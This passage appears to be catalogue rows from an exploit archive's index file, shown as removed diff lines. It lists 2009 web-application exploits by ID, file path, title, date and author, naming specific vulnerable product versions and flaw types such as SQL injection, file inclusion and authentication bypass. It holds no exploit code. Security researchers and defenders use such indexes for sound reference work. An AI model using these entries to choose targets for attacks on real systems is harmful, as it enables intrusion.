-8196,exploits/php/webapps/8196.txt,"WordPress MU < 2.7 - 'HOST' HTTP Header Cross-Site Scripting",2009-03-10,"Juan Galiana Lara",php,webapps, -8197,exploits/php/webapps/8197.txt,"Joomla! Component Djice Shoutbox 1.0 - Persistent Cross-Site Scripting",2009-03-10,XaDoS,php,webapps, -8198,exploits/php/webapps/8198.pl,"RoomPHPlanning 1.6 - 'userform.php' Create Admin User",2009-03-10,"Jonathan Salwan",php,webapps, -8202,exploits/php/webapps/8202.html,"Traidnt up 2.0 - 'cookie' Add Extension Bypass",2009-03-11,SP4rT,php,webapps, -8204,exploits/php/webapps/8204.txt,"phpmysport 1.4 - Cross-Site Scripting / SQL Injection",2009-03-12,XaDoS,php,webapps, -8207,exploits/php/webapps/8207.txt,"YAP 1.1.1 - 'index.php' Local File Inclusion",2009-03-13,Alkindiii,php,webapps, -8209,exploits/php/webapps/8209.txt,"Kim Websites 1.0 - Authentication Bypass",2009-03-13,"Virangar Security",php,webapps, -8210,exploits/php/webapps/8210.txt,"UBBCentral UBB.Threads 5.5.1 - 'message' SQL Injection",2009-03-16,s4squatch,php,webapps, -8216,exploits/php/webapps/8216.txt,"Beerwin's PHPLinkAdmin 1.0 - Remote File Inclusion / SQL Injection",2009-03-16,SirGod,php,webapps, -8217,exploits/php/webapps/8217.txt,"YAP 1.1.1 - Blind SQL Injection / SQL Injection",2009-03-16,SirGod,php,webapps, -8220,exploits/php/webapps/8220.txt,"phpComasy 0.9.1 - 'entry_id' SQL Injection",2009-03-16,boom3rang,php,webapps, -8226,exploits/php/webapps/8226.txt,"PHPRunner 4.2 - 'SearchOption' Blind SQL Injection",2009-03-17,BugReport.IR,php,webapps, -8228,exploits/php/webapps/8228.txt,"GDL 4.x - 'node' SQL Injection",2009-03-17,g4t3w4y,php,webapps, -8229,exploits/php/webapps/8229.txt,"WordPress Plugin fMoblog 2.1 - 'id' SQL Injection",2009-03-17,"strange kevin",php,webapps, -8230,exploits/php/webapps/8230.txt,"Mega File Hosting Script 1.2 - 'url' Remote File Inclusion",2009-03-17,Garry,php,webapps, -8237,exploits/php/webapps/8237.txt,"Facil-CMS 0.1RC2 - Multiple Vulnerabilities",2009-03-18,any.zicky,php,webapps, -8238,exploits/php/webapps/8238.txt,"Advanced Image Hosting (AIH) 2.3 - 'gal' Blind SQL Injection",2009-03-18,boom3rang,php,webapps, -8239,exploits/php/webapps/8239.txt,"Pivot 1.40.6 - Arbitrary File Deletion",2009-03-18,"Alfons Luja",php,webapps, -8240,exploits/php/webapps/8240.txt,"DeluxeBB 1.3 - 'qorder' SQL Injection",2009-03-18,girex,php,webapps, -8243,exploits/php/webapps/8243.txt,"Bloginator 1a - Cookie Bypass / SQL Injection",2009-03-19,Fireshot,php,webapps, -8244,exploits/php/webapps/8244.txt,"Bloginator 1a - SQL Injection / Command Injection (via Cookie Bypass )",2009-03-19,Fireshot,php,webapps, -8247,exploits/cgi/webapps/8247.txt,"Hannon Hill Cascade Server - Authenticated Command Execution",2009-03-19,"Emory University",cgi,webapps, -8252,exploits/php/webapps/8252.txt,"Pixie CMS - Cross-Site Scripting / SQL Injection",2009-03-20,"Justin Keane",php,webapps, -8254,exploits/php/webapps/8254.pl,"WBB3 rGallery 1.2.3 - 'UserGallery' Blind SQL Injection",2009-03-23,Invisibility,php,webapps, -8255,exploits/php/webapps/8255.txt,"Supernews 1.5 - 'valor.php?noticia' SQL Injection",2009-03-23,p3s0k!,php,webapps, -8258,exploits/php/webapps/8258.pl,"X-BLC 0.2.0 - 'get_read.php?section' SQL Injection",2009-03-23,dun,php,webapps, -8268,exploits/php/webapps/8268.php,"PHPizabi 0.848b C1 HFP1-3 - Remote Command Execution",2009-03-23,YOUCODE,php,webapps, -8271,exploits/php/webapps/8271.php,"Pluck CMS 4.6.1 - 'module_pages_site.php' Local File Inclusion",2009-03-23,"Alfons Luja",php,webapps, -8272,exploits/php/webapps/8272.pl,"Codice CMS 2 - Command Execution (via SQL Injection)",2009-03-23,darkjoker,php,webapps, -8276,exploits/php/webapps/8276.pl,"Syzygy CMS 0.3 - Local File Inclusion / SQL Injection",2009-03-23,Osirys,php,webapps, -8277,exploits/php/webapps/8277.txt,"Free Arcade Script 1.0 - Authentication Bypass / Arbitrary File Upload",2009-03-23,Mr.Skonnie,php,webapps, -8278,exploits/php/webapps/8278.txt,"Jinzora Media Jukebox 2.8 - 'name' Local File Inclusion",2009-03-24,dun,php,webapps, -8279,exploits/php/webapps/8279.txt,"PHPizabi 0.848b C1 HFP1 - Privilege Escalation",2009-03-24,Nine:Situations:Group,php,webapps, -8282,exploits/php/webapps/8282.txt,"SurfMyTV Script 1.0 - 'view.php?id' SQL Injection",2009-03-24,x0r,php,webapps, -8287,exploits/php/webapps/8287.php,"PHPizabi 0.848b C1 HFP1-3 - Arbitrary File Upload",2009-03-25,EgiX,php,webapps, -8288,exploits/php/webapps/8288.txt,"WeBid 0.7.3 RC9 - 'upldgallery.php' Arbitrary File Upload",2009-03-25,"Ahmad Pay",php,webapps, -8289,exploits/php/webapps/8289.pl,"PhotoStand 1.2.0 - Remote Command Execution",2009-03-26,Osirys,php,webapps, -8290,exploits/php/webapps/8290.txt,"blogplus 1.0 - Multiple Local File Inclusions",2009-03-26,ahmadbady,php,webapps, -8291,exploits/php/webapps/8291.txt,"acute control panel 1.0.0 - SQL Injection / Remote File Inclusion",2009-03-26,SirGod,php,webapps, -8292,exploits/php/webapps/8292.txt,"Simply Classified 0.2 - 'category_id' SQL Injection",2009-03-27,G4N0K,php,webapps, -8293,exploits/php/webapps/8293.txt,"Free PHP Petition Signing Script - Authentication Bypass",2009-03-27,Qabandi,php,webapps, -8296,exploits/php/webapps/8296.txt,"Arcadwy Arcade Script - 'Username' Static Cross-Site Scripting",2009-03-27,"Anarchy Angel",php,webapps, -8297,exploits/php/webapps/8297.txt,"Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 - File Disclosure",2009-03-27,"Christian J. Eibl",php,webapps, -8298,exploits/php/webapps/8298.pl,"My Simple Forum 7.1 - Remote Command Execution",2009-03-27,Osirys,php,webapps, -8302,exploits/php/webapps/8302.php,"glFusion 1.1.2 - 'COM_applyFilter()/order' SQL Injection",2009-03-29,Nine:Situations:Group,php,webapps, -8304,exploits/php/webapps/8304.txt,"Arcadwy Arcade Script - (Authentication Bypass) Insecure Cookie Handling",2009-03-29,ZoRLu,php,webapps, -8305,exploits/php/webapps/8305.txt,"iWare CMS 5.0.4 - Multiple SQL Injections",2009-03-29,boom3rang,php,webapps, -8307,exploits/asp/webapps/8307.txt,"Diskos CMS Manager - SQL Injection / File Disclosure / Authentication Bypass",2009-03-30,AnGeL25dZ,asp,webapps, -8309,exploits/php/webapps/8309.txt,"BandSite CMS 1.1.4 - 'members.php' SQL Injection",2009-03-30,SirGod,php,webapps, -8315,exploits/php/webapps/8315.txt,"gravy media CMS 1.07 - Multiple Vulnerabilities",2009-03-30,x0r,php,webapps, -8317,exploits/php/webapps/8317.pl,"X-Forum 0.6.2 - Remote Command Execution",2009-03-30,Osirys,php,webapps, -8318,exploits/php/webapps/8318.txt,"JobHut 1.2 - 'pk' SQL Injection",2009-03-30,K-159,php,webapps, -8319,exploits/php/webapps/8319.txt,"family connection 1.8.1 - Multiple Vulnerabilities",2009-03-30,"Salvatore Fresta",php,webapps, -8323,exploits/php/webapps/8323.txt,"Community CMS 0.5 - Multiple SQL Injections",2009-03-31,"Salvatore Fresta",php,webapps, -8324,exploits/php/webapps/8324.php,"Podcast Generator 1.1 - Remote Code Execution",2009-03-31,BlackHawk,php,webapps, -8326,exploits/php/webapps/8326.rb,"VirtueMart 1.1.2 - SQL Injection (Metasploit)",2009-03-31,waraxe,php,webapps, -8327,exploits/php/webapps/8327.txt,"virtuemart 1.1.2 - Multiple Vulnerabilities",2009-03-31,waraxe,php,webapps, -8328,exploits/php/webapps/8328.txt,"webEdition 6.0.0.4 - 'WE_LANGUAGE' Local File Inclusion",2009-03-31,"Salvatore Fresta",php,webapps, -8329,exploits/php/webapps/8329.txt,"JobHut 1.2 - Remote Password Change/Delete/Activate User",2009-03-31,"ThE g0bL!N",php,webapps, -8330,exploits/php/webapps/8330.txt,"PHPRecipeBook 2.39 - 'course_id' SQL Injection",2009-03-31,DarKdewiL,php,webapps, -8331,exploits/php/webapps/8331.txt,"vsp stats processor 0.45 - 'gamestat.php?gameID' SQL Injection",2009-03-31,Dimi4,php,webapps, -8334,exploits/php/webapps/8334.txt,"Koschtit Image Gallery 1.82 - Multiple Local File Inclusions",2009-04-01,ahmadbady,php,webapps, -8341,exploits/php/webapps/8341.txt,"MyioSoft Ajax Portal 3.0 - 'page' SQL Injection",2009-04-01,cOndemned,php,webapps, -8342,exploits/php/webapps/8342.txt,"TinyPHPForum 3.61 - File Disclosure / Code Execution",2009-04-01,brain[pillow],php,webapps, -8346,exploits/php/webapps/8346.txt,"ActiveKB KnowledgeBase - 'Panel' Local File Inclusion",2009-04-03,"Angela Chang",php,webapps, -8347,exploits/php/webapps/8347.php,"glFusion 1.1.2 - 'COM_applyFilter()/cookies' Blind SQL Injection",2009-04-03,Nine:Situations:Group,php,webapps, -8348,exploits/php/webapps/8348.txt,"form2list - 'page.php?id' SQL Injection",2009-04-03,Cyber-Zone,php,webapps, -8349,exploits/php/webapps/8349.c,"Family Connections 1.8.2 - Arbitrary File Upload",2009-04-03,"Salvatore Fresta",php,webapps, -8350,exploits/php/webapps/8350.txt,"Gravity Board X 2.0 Beta - SQL Injection / Authenticated Code Execution",2009-04-03,brain[pillow],php,webapps, -8351,exploits/php/webapps/8351.pl,"AdaptBB 1.0 - 'topic_id' SQL Injection / Credentials Disclosure",2009-04-03,StAkeR,php,webapps, -8353,exploits/php/webapps/8353.txt,"Joomla! Component com_bookJoomlas 0.1 - SQL Injection",2009-04-06,"Salvatore Fresta",php,webapps, -8355,exploits/php/webapps/8355.txt,"FlexCMS Calendar - 'itemID' Blind SQL Injection",2009-04-06,Lanti-Net,php,webapps, -8357,exploits/php/webapps/8357.py,"iDB 0.2.5pa SVN 243 - 'skin' Local File Inclusion",2009-04-06,LOTFREE,php,webapps, -8361,exploits/php/webapps/8361.txt,"Family Connections CMS 1.8.2 - Blind SQL Injection",2009-04-07,"Salvatore Fresta",php,webapps, -8362,exploits/php/webapps/8362.php,"Lanius CMS 0.5.2 - Arbitrary File Upload",2009-04-07,EgiX,php,webapps, -8364,exploits/php/webapps/8364.txt,"saspcms 0.9 - Multiple Vulnerabilities",2009-04-08,BugReport.IR,php,webapps, -8365,exploits/php/webapps/8365.txt,"Joomla! Component Maian Music 1.2.1 - 'category' SQL Injection",2009-04-08,H!tm@N,php,webapps, -8366,exploits/php/webapps/8366.txt,"Joomla! Component MailTo - 'article' SQL Injection",2009-04-08,H!tm@N,php,webapps, -8367,exploits/php/webapps/8367.txt,"Joomla! Component Cmimarketplace - 'viewit' Directory Traversal",2009-04-08,H!tm@N,php,webapps, -8372,exploits/php/webapps/8372.txt,"photo graffix 3.4 - Multiple Vulnerabilities",2009-04-08,ahmadbady,php,webapps, -8373,exploits/php/webapps/8373.txt,"Xplode CMS - 'wrap_script' SQL Injection",2009-04-08,PLATEN,php,webapps, -8374,exploits/php/webapps/8374.txt,"WebFileExplorer 3.1 - 'db.mdb' Database Disclosure",2009-04-08,ByALBAYX,php,webapps, -8376,exploits/php/webapps/8376.php,"Geeklog 1.5.2 - 'SEC_authenticate()' SQL Injection",2009-04-09,Nine:Situations:Group,php,webapps, -8377,exploits/asp/webapps/8377.pl,"Exjune Guestbook 2.0 - Remote Database Disclosure",2009-04-09,AlpHaNiX,asp,webapps, -8379,exploits/asp/webapps/8379.txt,"Back-End CMS 5.0 - 'main.asp?id' SQL Injection",2009-04-09,AnGeL25dZ,asp,webapps, -8380,exploits/php/webapps/8380.txt,"Simbas CMS 2.0 - Authentication Bypass",2009-04-09,"ThE g0bL!N",php,webapps, -8382,exploits/php/webapps/8382.txt,"WebFileExplorer 3.1 - Authentication Bypass",2009-04-09,Osirys,php,webapps, -8383,exploits/php/webapps/8383.txt,"adaptbb 1.0b - Multiple Vulnerabilities",2009-04-09,"Salvatore Fresta",php,webapps, -8385,exploits/php/webapps/8385.txt,"My Dealer CMS 2.0 - Authentication Bypass",2009-04-09,"ThE g0bL!N",php,webapps, -8386,exploits/php/webapps/8386.txt,"Absolute Form Processor XE-V 1.5 - Authentication Bypass",2009-04-09,"ThE g0bL!N",php,webapps, -8387,exploits/php/webapps/8387.txt,"dynamic flash forum 1.0 Beta - Multiple Vulnerabilities",2009-04-09,"Salvatore Fresta",php,webapps, -8388,exploits/php/webapps/8388.txt,"PHP-Agenda 2.2.5 - Remote File Overwriting",2009-04-10,"Salvatore Fresta",php,webapps, -8389,exploits/php/webapps/8389.txt,"Loggix Project 9.4.5 - 'refer_id' Blind SQL Injection",2009-04-10,"Salvatore Fresta",php,webapps, -8394,exploits/php/webapps/8394.txt,"moziloCMS 1.11 - Local File Inclusion / Full Path Disclosure / Cross-Site Scripting",2009-04-10,SirGod,php,webapps, -8395,exploits/php/webapps/8395.txt,"RedaxScript 0.2.0 - 'Language' Local File Inclusion",2009-04-10,SirGod,php,webapps, -8396,exploits/php/webapps/8396.pl,"w3bcms Gaestebuch 3.0.0 - Blind SQL Injection",2009-04-10,DNX,php,webapps, -8397,exploits/asp/webapps/8397.txt,"FunkyASP AD System 1.1 - Arbitrary File Upload",2009-04-10,ZoRLu,asp,webapps, -8399,exploits/php/webapps/8399.pl,"Flatnuke 2.7.1 - 'level' Privilege Escalation",2009-04-13,StAkeR,php,webapps, -8408,exploits/php/webapps/8408.txt,"X10media Mp3 Search Engine < 1.6.2 - Admin Access",2009-04-13,THUNDER,php,webapps, -8409,exploits/php/webapps/8409.txt,"Yellow Duck Weblog 2.1.0 - 'lang' Local File Inclusion",2009-04-13,ahmadbady,php,webapps, -8414,exploits/php/webapps/8414.txt,"XEngineSoft PMS/MGS/NM/Ams 1.0 - Authentication Bypass",2009-04-13,Dr-HTmL,php,webapps, -8415,exploits/php/webapps/8415.txt,"FreznoShop 1.3.0 - 'id' SQL Injection",2009-04-13,NoGe,php,webapps, -8417,exploits/php/webapps/8417.txt,"e107 Plugin userjournals_menu - 'blog.id' SQL Injection",2009-04-13,boom3rang,php,webapps, -8418,exploits/php/webapps/8418.pl,"ASP Product Catalog 1.0 - Cross-Site Scripting / File Disclosure",2009-04-13,AlpHaNiX,php,webapps, -8423,exploits/php/webapps/8423.txt,"Jamroom 4.0.2 - 't' Local File Inclusion",2009-04-14,zxvf,php,webapps, -8424,exploits/php/webapps/8424.txt,"ablespace 1.0 - Cross-Site Scripting / Blind SQL Injection",2009-04-14,DSecRG,php,webapps, -8425,exploits/php/webapps/8425.txt,"PHP-revista 1.1.2 - Remote File Inclusion / SQL Injection / Authentication Bypass / Cross-Site Scripting",2009-04-14,SirDarckCat,php,webapps, -8431,exploits/php/webapps/8431.txt,"GuestCal 2.1 - 'index.php?lang' Local File Inclusion",2009-04-14,SirGod,php,webapps, -8432,exploits/php/webapps/8432.txt,"Aqua CMS - 'Username' SQL Injection",2009-04-14,halkfild,php,webapps, -8433,exploits/php/webapps/8433.txt,"RQms (Rash) 1.2.2 - Multiple SQL Injections",2009-04-14,Dimi4,php,webapps, -8435,exploits/php/webapps/8435.txt,"phpEmployment - 'conf.inc' File Disclosure",2009-04-14,InjEctOr5,php,webapps, -8436,exploits/php/webapps/8436.txt,"Job2C 4.2 - 'profile' Arbitrary File Upload",2009-04-15,InjEctOr5,php,webapps, -8437,exploits/php/webapps/8437.txt,"phpAdBoard - 'conf.inc' Remote Configuration File Disclosure",2009-04-15,InjEctOr5,php,webapps, -8438,exploits/php/webapps/8438.txt,"phpGreetCards - Config File Disclosure",2009-04-15,InjEctOr5,php,webapps, -8439,exploits/php/webapps/8439.txt,"W2B Restaurant 1.2 - 'conf.inc' Configuration File Disclosure",2009-04-15,InjEctOr5,php,webapps, -8440,exploits/php/webapps/8440.txt,"phpAdBoardPro - 'config.inc' Configuration File Disclosure",2009-04-15,InjEctOr5,php,webapps, -8441,exploits/php/webapps/8441.txt,"phpDatingClub - 'conf.inc' File Disclosure",2009-04-15,InjEctOr5,php,webapps, -8442,exploits/php/webapps/8442.txt,"Job2C - 'conf.inc' Configuration File Disclosure",2009-04-15,InjEctOr5,php,webapps, -8443,exploits/php/webapps/8443.txt,"Job2C 4.2 - 'adtype' Local File Inclusion",2009-04-15,ZoRLu,php,webapps, -8446,exploits/php/webapps/8446.txt,"FreeWebShop.org 2.2.9 RC2 - 'lang_file' Local File Inclusion",2009-04-15,ahmadbady,php,webapps, -8448,exploits/php/webapps/8448.php,"Geeklog 1.5.2 - 'savepreferences()/*blocks[]' SQL Injection",2009-04-16,Nine:Situations:Group,php,webapps, -8449,exploits/php/webapps/8449.txt,"NetHoteles 2.0/3.0 - Authentication Bypass",2009-04-16,Dns-Team,php,webapps, -8450,exploits/php/webapps/8450.txt,"Online Password Manager 4.1 - Insecure Cookie Handling",2009-04-16,ZoRLu,php,webapps, -8453,exploits/php/webapps/8453.txt,"webSPELL 4.2.0c - Bypass BBCode Cross-Site Scripting Cookie Stealing",2009-04-16,YEnH4ckEr,php,webapps, -8454,exploits/php/webapps/8454.txt,"DNS Tools (PHP Digger) - Remote Command Execution",2009-04-16,SirGod,php,webapps, -8455,exploits/php/webapps/8455.txt,"CPCommerce 1.2.8 - 'id_document' Blind SQL Injection",2009-04-16,NoGe,php,webapps, -8457,exploits/php/webapps/8457.txt,"NetHoteles 3.0 - 'ficha.php' SQL Injection",2009-04-16,snakespc,php,webapps, -8459,exploits/php/webapps/8459.html,"eLitius 1.0 - '/manage-admin.php' Arbitrary Add Admin/Change Password",2009-04-16,"ThE g0bL!N",php,webapps, -8460,exploits/php/webapps/8460.txt,"SMA-DB 0.3.13 - Multiple Remote File Inclusions",2009-04-16,JosS,php,webapps, -8461,exploits/php/webapps/8461.txt,"chCounter 3.1.3 - Authentication Bypass",2009-04-16,tmh,php,webapps, -8464,exploits/php/webapps/8464.txt,"Tiny Blogr 1.0.0 rc4 - Authentication Bypass",2009-04-17,"Salvatore Fresta",php,webapps, -8468,exploits/php/webapps/8468.txt,"Limbo CMS 1.0.4.2 - Cross-Site Request Forgery / Privilege Escalation (PoC)",2009-04-17,"Alfons Luja",php,webapps, -8471,exploits/php/webapps/8471.txt,"ClanTiger < 1.1.1 - Multiple Insecure Cookie Handling Vulnerabilities",2009-04-17,YEnH4ckEr,php,webapps, -8472,exploits/php/webapps/8472.txt,"ClanTiger 1.1.1 - Authentication Bypass",2009-04-17,YEnH4ckEr,php,webapps, -8473,exploits/php/webapps/8473.pl,"ClanTiger 1.1.1 - 'slug' Blind SQL Injection",2009-04-17,YEnH4ckEr,php,webapps, -8474,exploits/php/webapps/8474.txt,"e-cart.biz Shopping Cart - Arbitrary File Upload",2009-04-17,ahmadbady,php,webapps, -8475,exploits/php/webapps/8475.txt,"Esoftpro Online Guestbook Pro - 'display' Blind SQL Injection",2009-04-17,"Hussin X",php,webapps, -8476,exploits/php/webapps/8476.txt,"Online Email Manager - Insecure Cookie Handling",2009-04-17,"Hussin X",php,webapps, -8477,exploits/php/webapps/8477.txt,"Hot Project 7.0 - Authentication Bypass",2009-04-17,HCOCA_MAN,php,webapps, -8480,exploits/php/webapps/8480.txt,"multi-lingual E-Commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps, -8481,exploits/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 - 'profile' Arbitrary File Upload",2009-04-20,JosS,php,webapps, -8482,exploits/php/webapps/8482.txt,"Seditio CMS Events Plugin - 'c' SQL Injection",2009-04-20,OoN_Boy,php,webapps, -8483,exploits/php/webapps/8483.txt,"Flatnux 2009-03-27 - Arbitrary File Upload / Information Disclosure",2009-04-20,girex,php,webapps, -8486,exploits/php/webapps/8486.txt,"webClassifieds 2005 - (Authentication Bypass) Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps, -8487,exploits/php/webapps/8487.txt,"EZ Webitor - Authentication Bypass",2009-04-20,snakespc,php,webapps, -8488,exploits/php/webapps/8488.pl,"Pligg CMS 9.9.0 - 'editlink.php' Blind SQL Injection",2009-04-20,"Rohit Bansal",php,webapps, -8491,exploits/php/webapps/8491.pl,"WysGui CMS 1.2b - Insecure Cookie Handling Blind SQL Injection",2009-04-20,YEnH4ckEr,php,webapps, -8492,exploits/php/webapps/8492.txt,"WB News 2.1.2 - Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps, -8493,exploits/php/webapps/8493.txt,"fungamez rc1 - Authentication Bypass / Local File Inclusion",2009-04-20,YEnH4ckEr,php,webapps, -8494,exploits/php/webapps/8494.txt,"TotalCalendar 2.4 - 'inc_dir' Remote File Inclusion",2009-04-20,DarKdewiL,php,webapps, -8495,exploits/php/webapps/8495.pl,"e107 < 0.7.15 - 'extended_user_fields' Blind SQL Injection",2009-04-20,StAkeR,php,webapps, -8496,exploits/php/webapps/8496.html,"TotalCalendar 2.4 - Remote Password Change",2009-04-20,"ThE g0bL!N",php,webapps, -8497,exploits/php/webapps/8497.txt,"Creasito E-Commerce 1.3.16 - Authentication Bypass",2009-04-20,"Salvatore Fresta",php,webapps, -8498,exploits/php/webapps/8498.txt,"eLitius 1.0 - Arbitrary Database Backup",2009-04-20,"ThE g0bL!N",php,webapps, -8499,exploits/php/webapps/8499.php,"Dokeos Lms 1.8.5 - 'whoisonline.php' PHP Code Injection",2009-04-21,EgiX,php,webapps, -8501,exploits/php/webapps/8501.txt,"CRE Loaded 6.2 - 'products_id' SQL Injection",2009-04-21,Player,php,webapps, -8502,exploits/php/webapps/8502.txt,"pastelcms 0.8.0 - Local File Inclusion / SQL Injection",2009-04-21,SirGod,php,webapps, -8503,exploits/php/webapps/8503.txt,"TotalCalendar 2.4 - 'Include' Local File Inclusion",2009-04-21,SirGod,php,webapps, -8504,exploits/php/webapps/8504.txt,"NotFTP 1.3.1 - 'newlang' Local File Inclusion",2009-04-21,Kacper,php,webapps, -8505,exploits/php/webapps/8505.txt,"Quick.CMS.Lite 0.5 - 'id' SQL Injection",2009-04-21,Player,php,webapps, -8506,exploits/php/webapps/8506.txt,"VS PANEL 7.3.6 - 'Cat_ID' SQL Injection",2009-04-21,Player,php,webapps, -8508,exploits/php/webapps/8508.txt,"I-Rater Pro/Plantinum 4.0 - Authentication Bypass",2009-04-21,Hakxer,php,webapps, -8509,exploits/php/webapps/8509.txt,"Studio Lounge Address Book 2.5 - Authentication Bypass",2009-04-21,"ThE g0bL!N",php,webapps, -8510,exploits/php/webapps/8510.txt,"mixedcms 1.0b - Local File Inclusion / Arbitrary File Upload / Authentication Bypass / File Disclosure",2009-04-21,YEnH4ckEr,php,webapps, -8513,exploits/php/webapps/8513.pl,"Dokeos Lms 1.8.5 - 'Include' Remote Code Execution",2009-04-22,StAkeR,php,webapps, -8514,exploits/php/webapps/8514.txt,"Elkagroup Image Gallery 1.0 - Arbitrary File Upload",2009-04-22,Securitylab.ir,php,webapps, -8515,exploits/php/webapps/8515.txt,"5 star Rating 1.2 - Authentication Bypass",2009-04-22,zer0day,php,webapps, -8516,exploits/php/webapps/8516.txt,"WebPortal CMS 0.8b - Multiple Local/Remote File Inclusions",2009-04-22,ahmadbady,php,webapps, -8517,exploits/php/webapps/8517.txt,"Joomla! Component rsmonials - Cross-Site Scripting",2009-04-22,jdc,php,webapps, -8521,exploits/php/webapps/8521.txt,"fowlcms 1.1 - Authentication Bypass / Local File Inclusion / Arbitrary File Upload",2009-04-23,YEnH4ckEr,php,webapps, -8529,exploits/asp/webapps/8529.txt,"Absolute Form Processor XE-V 1.5 - Insecure Cookie Handling",2009-04-24,ZoRLu,asp,webapps, -8530,exploits/asp/webapps/8530.html,"Absolute Form Processor XE-V 1.5 - Remote Change Password",2009-04-24,"ThE g0bL!N",asp,webapps, -8532,exploits/php/webapps/8532.txt,"photo-rigma.biz 30 - SQL Injection / Cross-Site Scripting",2009-04-24,YEnH4ckEr,php,webapps, -8533,exploits/php/webapps/8533.txt,"Pragyan CMS 2.6.4 - Multiple SQL Injections",2009-04-24,"Salvatore Fresta",php,webapps, -8538,exploits/php/webapps/8538.txt,"Invision Power Board 3.0.0b5 - Active Cross-Site Scripting / Full Path Disclosure",2009-04-27,brain[pillow],php,webapps, -8539,exploits/php/webapps/8539.txt,"Opencart 1.1.8 - 'route' Local File Inclusion",2009-04-27,OoN_Boy,php,webapps, -8543,exploits/php/webapps/8543.php,"LightBlog 9.9.2 - 'register.php' Remote Code Execution",2009-04-27,EgiX,php,webapps, -8545,exploits/php/webapps/8545.txt,"Dew-NewPHPLinks 2.0 - Local File Inclusion / Cross-Site Scripting",2009-04-27,d3v1l,php,webapps, -8546,exploits/php/webapps/8546.txt,"Thickbox Gallery 2 - 'index.php' Local File Inclusion",2009-04-27,SirGod,php,webapps, -8547,exploits/php/webapps/8547.txt,"EZ-Blog Beta2 - 'category' SQL Injection",2009-04-27,YEnH4ckEr,php,webapps, -8548,exploits/php/webapps/8548.txt,"ECShop 2.5.0 - 'order_sn' SQL Injection",2009-04-27,Securitylab.ir,php,webapps, -8549,exploits/php/webapps/8549.txt,"Flatchat 3.0 - 'pmscript.php' Local File Inclusion",2009-04-27,SirGod,php,webapps, -8550,exploits/php/webapps/8550.txt,"Teraway LinkTracker 1.0 - Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",php,webapps, -8551,exploits/php/webapps/8551.txt,"Teraway FileStream 1.0 - Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",php,webapps, -8552,exploits/php/webapps/8552.txt,"Teraway LiveHelp 2.0 - Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",php,webapps, -8553,exploits/php/webapps/8553.html,"Teraway LinkTracker 1.0 - Remote Password Change",2009-04-27,"ThE g0bL!N",php,webapps, -8555,exploits/php/webapps/8555.txt,"ABC Advertise 1.0 - Admin Password Disclosure",2009-04-27,SirGod,php,webapps, -8557,exploits/php/webapps/8557.html,"VisionLms 1.0 - 'changePW.php' Remote Password Change",2009-04-28,Mr.tro0oqy,php,webapps, -8558,exploits/php/webapps/8558.txt,"MIM: InfiniX 1.2.003 - Multiple SQL Injections",2009-04-28,YEnH4ckEr,php,webapps, -8559,exploits/php/webapps/8559.c,"webSPELL 4.2.0d (Linux) - Local File Disclosure (C)",2009-04-28,StAkeR,php,webapps, -8563,exploits/php/webapps/8563.txt,"eLitius 1.0 - 'banner-details.php?id' SQL Injection",2009-04-29,snakespc,php,webapps, -8565,exploits/php/webapps/8565.txt,"ProjectCMS 1.0b - 'index.php?sn' SQL Injection",2009-04-29,YEnH4ckEr,php,webapps, -8566,exploits/php/webapps/8566.txt,"S-CMS 1.1 Stable - 'page' Local File Inclusion",2009-04-29,ZoRLu,php,webapps, -8567,exploits/php/webapps/8567.txt,"Zubrag Smart File Download 1.3 - Arbitrary File Download",2009-04-29,Aodrulez,php,webapps, -8571,exploits/php/webapps/8571.txt,"Tiger Dms - Authentication Bypass",2009-04-29,"ThE g0bL!N",php,webapps, -8576,exploits/php/webapps/8576.pl,"Leap CMS 0.1.4 - 'searchterm' Blind SQL Injection",2009-04-30,YEnH4ckEr,php,webapps, -8577,exploits/php/webapps/8577.txt,"Leap CMS 0.1.4 - SQL Injection / Cross-Site Scripting / Arbitrary File Upload",2009-04-30,YEnH4ckEr,php,webapps, -8585,exploits/php/webapps/8585.txt,"Golabi CMS 1.0.1 - Session Poisoning",2009-05-01,CrazyAngel,php,webapps, -8586,exploits/php/webapps/8586.txt,"MiniTwitter 0.2b - Multiple SQL Injections",2009-05-01,YEnH4ckEr,php,webapps, -8587,exploits/php/webapps/8587.html,"MiniTwitter 0.2b - Remote User Options Changer",2009-05-01,YEnH4ckEr,php,webapps, -8593,exploits/php/webapps/8593.txt,"pecio CMS 1.1.5 - 'index.php?language' Local File Inclusion",2009-05-01,SirGod,php,webapps, -8596,exploits/asp/webapps/8596.pl,"Winn ASP Guestbook 1.01b - Remote Database Disclosure",2009-05-04,ZoRLu,asp,webapps, -8599,exploits/php/webapps/8599.txt,"AGTC MyShop 3.2 - Insecure Cookie Handling",2009-05-04,Mr.tro0oqy,php,webapps, -8600,exploits/php/webapps/8600.txt,"BluSky CMS - 'news_id' SQL Injection",2009-05-04,snakespc,php,webapps, -8602,exploits/php/webapps/8602.txt,"Qt QuickTeam - Multiple Remote File Inclusions",2009-05-04,ahmadbady,php,webapps, -8603,exploits/php/webapps/8603.php,"eLitius 1.0 - Remote Command Execution",2009-05-04,G4N0K,php,webapps, -8604,exploits/php/webapps/8604.txt,"PHP Site Lock 2.0 - Insecure Cookie Handling",2009-05-04,"ThE g0bL!N",php,webapps, -8605,exploits/php/webapps/8605.txt,"Million Dollar Text Links 1.0 - Arbitrary Authentication Bypass",2009-05-04,"ThE g0bL!N",php,webapps, -8608,exploits/php/webapps/8608.txt,"projectCMS 1.1b - Multiple Vulnerabilities",2009-05-04,YEnH4ckEr,php,webapps, -8609,exploits/php/webapps/8609.pl,"Uguestbook 1.0b - 'Guestbook.mdb' Arbitrary Database Disclosure",2009-05-04,Cyber-Zone,php,webapps, -8610,exploits/asp/webapps/8610.pl,"Ublog access version - Arbitrary Database Disclosure",2009-05-04,Cyber-Zone,asp,webapps, -8615,exploits/php/webapps/8615.txt,"TemaTres 1.0.3 - Authentication Bypass / SQL Injection / Cross-Site Scripting",2009-05-05,YEnH4ckEr,php,webapps, -8616,exploits/php/webapps/8616.pl,"TemaTres 1.0.3 - Blind SQL Injection",2009-05-05,YEnH4ckEr,php,webapps, -8618,exploits/php/webapps/8618.txt,"LinkBase 2.0 - Remote Cookie 